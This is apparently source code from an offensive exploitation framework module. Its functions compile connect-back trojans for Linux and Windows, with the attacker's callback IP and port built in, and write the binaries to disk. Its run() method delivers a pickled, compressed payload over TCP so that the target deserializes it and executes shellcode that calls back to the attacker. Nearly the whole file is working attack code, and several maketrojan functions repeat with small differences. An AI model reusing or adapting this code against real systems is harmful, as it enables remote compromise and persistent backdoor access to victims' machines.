def create_native_python_mosdef(self):
ip_bytes = ["%02x" % ord(byte) for byte in socket.inet_aton(self.callback.ip)]
if len(ip_bytes) < 4:
ip_bytes = "\x00"* (4-len(ip_bytes))
cback_addr = "0x"+"".join(ip_bytes)
cback_port = self.callback.port
mosdef_type = 22
cc_args = ["-c", "-k", "2.6", "-t", "24",
"-D", "__AMD64__",
"-D", "CBACK_ADDR=%s" % cback_addr,
"-D", "CBACK_PORT=%d" % cback_port,
"-D", "MOSDEF_TYPE=%d" % mosdef_type,
"-v",
"-m", "Linux",
"-p", "X64",
os.path.join(canvas_root_directory, "backdoors", "cback_mmap_rwx.c")]
threadsafe_cc_main(cc_args)
with open(os.path.join(canvas_root_directory, "cback_mmap_rwx.sc"), "rb") as handle:
shellcode_data = handle.read()
shellcode_data = ("A" if len(shellcode_data) % 2 != 0 else "") + shellcode_data
payload = escape_chars(shellcode_data)
python_x64_mosdef_loader = template_python_x64_mosdef_loader.replace("INSERT_MOSDEF_HERE", payload)
return python_x64_mosdef_loader
def maketrojan(self):
t_os = canvasos('Linux')
t_os.arch = "X86"
from MOSDEF import makeexe
from MOSDEF.cc import threadsafe_cc_main
self.log('[D2] Compiling Unix trojan')
infilename = "backdoors/cback_mmap_rwx.c"
vars = {}
vars['CBACK_PORT'] = self.callback.port
vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip))
self.log('[D2] Callback address is %s' % vars['CBACK_ADDR'])
cc_command = []
for var in vars:
cc_command += ["-D", "%s=%s" % (var, vars[var])]
cc_command += [
"-d", "-v", "-m", "Linux", "-p", "i386", "-k", "None", infilename
]
self.log('[D2] CC command: %s"%cc_command')
mosdeftrojan = threadsafe_cc_main(cc_command)
if not mosdeftrojan:
self.log('[D2] Was unable to create trojan!')
return ''
self.log('[D2] Length of CC compiled trojan: %s' % len(mosdeftrojan))
self.log('[D2] Writing out %d bytes to %s' %
(len(mosdeftrojan), self.trojanname))
file(self.trojanname, "wb").write(mosdeftrojan)
ret = len(mosdeftrojan) != 0
return ret
def maketrojan_linux(self):
from MOSDEF import makeexe
from MOSDEF.cc import threadsafe_cc_main
self.log("[!] Compiling Unix trojan")
infilename = "backdoors/cback_mmap_rwx.c"
vars = {}
vars['CBACK_PORT'] = self.callback.port
vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip))
self.log("[!] Callback address is %s" % vars['CBACK_ADDR'])
cc_command = []
for var in vars:
cc_command += ["-D", "%s=%s" % (var, vars[var])]
cc_command += [
"-d", "-v", "-m", "Linux", "-p", "i386", "-k", "None", infilename
]
self.log("[!] CC command: %s" % cc_command)
self.mosdeftrojan = threadsafe_cc_main(cc_command)
self.log("[!] Length of CC compiled trojan: %s" %
len(self.mosdeftrojan))
self.log("[!] Writing out %d bytes to %s" %
(len(self.mosdeftrojan), self.trojannamelinux))
file(self.trojannamelinux, "wb").write(self.mosdeftrojan)
self.setInfo("%s - done" % (NAME))
ret = len(self.mosdeftrojan) != 0
return ret
def buildTrojan(self, type="Linux", arch="X86"):
"build a MOSDEF based trojan binary"
mosdeftrojan = ""
if type in ["Linux", "Solaris"]:
from MOSDEF import makeexe
from MOSDEF.cc import threadsafe_cc_main
self.log("[!] Compiling Unix trojan")
infilename = "backdoors/cback_mmap_rwx.c"
vars = {}
vars['CBACK_PORT'] = self.callback.port
vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip))
self.log("[!] Callback address is %s" % vars['CBACK_ADDR'])
cc_command = []
for var in vars:
cc_command += ["-D", "%s=%s" % (var, vars[var])]
cc_command += ["-v", "-m", type, "-p", arch, infilename]
self.log("[!] CC command: %s" % cc_command)
mosdeftrojan = threadsafe_cc_main(cc_command)
if not mosdeftrojan:
self.log("[X] Was unable to create trojan!")
return ""
self.log("[!] Length of CC compiled trojan: %s" %
len(mosdeftrojan))
elif type in ["Windows"]:
from MOSDEF import pelib
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {
"port": self.callback.port,
"ipaddress": self.callback.ip
})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread", None)
shellcode = sc.get()
myPElib = pelib.PElib()
mosdeftrojan = myPElib.createPEFileBuf(shellcode)
if mosdeftrojan == None:
self.log("Some sort of error compiling our PE")
return ""
self.log("[!] Win32 MOSDEF Trojan compiled to %d bytes" %
len(mosdeftrojan))
return mosdeftrojan
def maketrojan(self):
t_os = canvasos(targets[self.version])
t_os.arch = "X86"
if self.version == 0:
self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os)
self.log("Writing out %d bytes to %s" %
(len(self.mosdeftrojan), self.trojanname))
self.htafile = self.file4hta(self.mosdeftrojan)
file(self.trojanname, "wb").write(self.htafile)
self.setInfo("%s - done" % (NAME))
ret = len(self.mosdeftrojan) != 0
else:
from MOSDEF import makeexe
from MOSDEF.cc import threadsafe_cc_main
self.log("[!] Compiling Unix trojan")
infilename = "backdoors/cback_mmap_rwx.c"
vars = {}
vars['CBACK_PORT'] = self.callback.port
vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip))
self.log("[!] Callback address is %s" % vars['CBACK_ADDR'])
cc_command = []
for var in vars:
cc_command += ["-D", "%s=%s" % (var, vars[var])]
cc_command += [
"-d", "-v", "-m", "Linux", "-p", "i386", "-k", "None",
infilename
]
self.log("[!] CC command: %s" % cc_command)
mosdeftrojan = threadsafe_cc_main(cc_command)
if not mosdeftrojan:
self.log("[X] Was unable to create trojan!")
return ""
self.log("[!] Length of CC compiled trojan: %s" %
len(mosdeftrojan))
self.log("[!] Writing out %d bytes to %s" %
(len(mosdeftrojan), self.trojanname))
file(self.trojanname, "wb").write(mosdeftrojan)
ret = len(mosdeftrojan) != 0
return ret
def run(self):
global unsafe_template_python_x86_mosdef_loader
global safe_template_python_x86_mosdef_loader
global python_x86_mosdef_loader
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port))
self.log("Attacking %s:%d"%(self.host,self.port))
ret=0
if False:
t_os = canvasos("Linux")
t_os.arch = "X64"
self.buildmosdeftrojan(self.callback.ip, self.callback.port,
target_os=t_os, http=self.mosdef_http,
ssl=self.mosdef_ssl,
universal=self.mosdef_universal,
encrypted=self.mosdef_encrypted)
payload = escape_chars(self.mosdeftrojan)
python_x86_mosdef_loader = safe_template_python_x86_mosdef_loader.replace("INSERT_MOSDEF_HERE", payload)
else:
payload = None
try:
os.unlink(os.path.join(canvas_root_directory, "cback_mmap_rwx.sc"))
except IOError as e:
pass
except OSError as e:
pass
ip_bytes = ["%02x" % ord(byte) for byte in socket.inet_aton(self.callback.ip)]
if len(ip_bytes) < 4:
ip_bytes = "\x00"* (4-len(ip_bytes))
cback_addr = "0x"+"".join(ip_bytes)
cback_port = self.callback.port
mosdef_type = 22
cc_args = ["-c", "-k", "2.6", "-t", "24",
"-D", "__AMD64__",
"-D", "CBACK_ADDR=%s" % cback_addr,
"-D", "CBACK_PORT=%d" % cback_port,
"-D", "MOSDEF_TYPE=%d" % mosdef_type,
"-v",
"-m", "Linux",
"-p", "X64",
os.path.join(canvas_root_directory, "backdoors", "cback_mmap_rwx.c")]
threadsafe_cc_main(cc_args)
with open(os.path.join(canvas_root_directory, "cback_mmap_rwx.sc"), "rb") as handle:
shellcode_data = handle.read()
shellcode_data = ("A" if len(shellcode_data) % 2 != 0 else "") + shellcode_data
payload = escape_chars(shellcode_data)
python_x86_mosdef_loader = unsafe_template_python_x86_mosdef_loader.replace("INSERT_MOSDEF_HERE", payload)
pickled = cPickle.dumps(PayloadObject())
s=self.gettcpsock()
s.connect((self.host, self.port))
self.websend(s, base64.b64encode(zlib.compress(pickled))+"\n")
s.close()
return 1
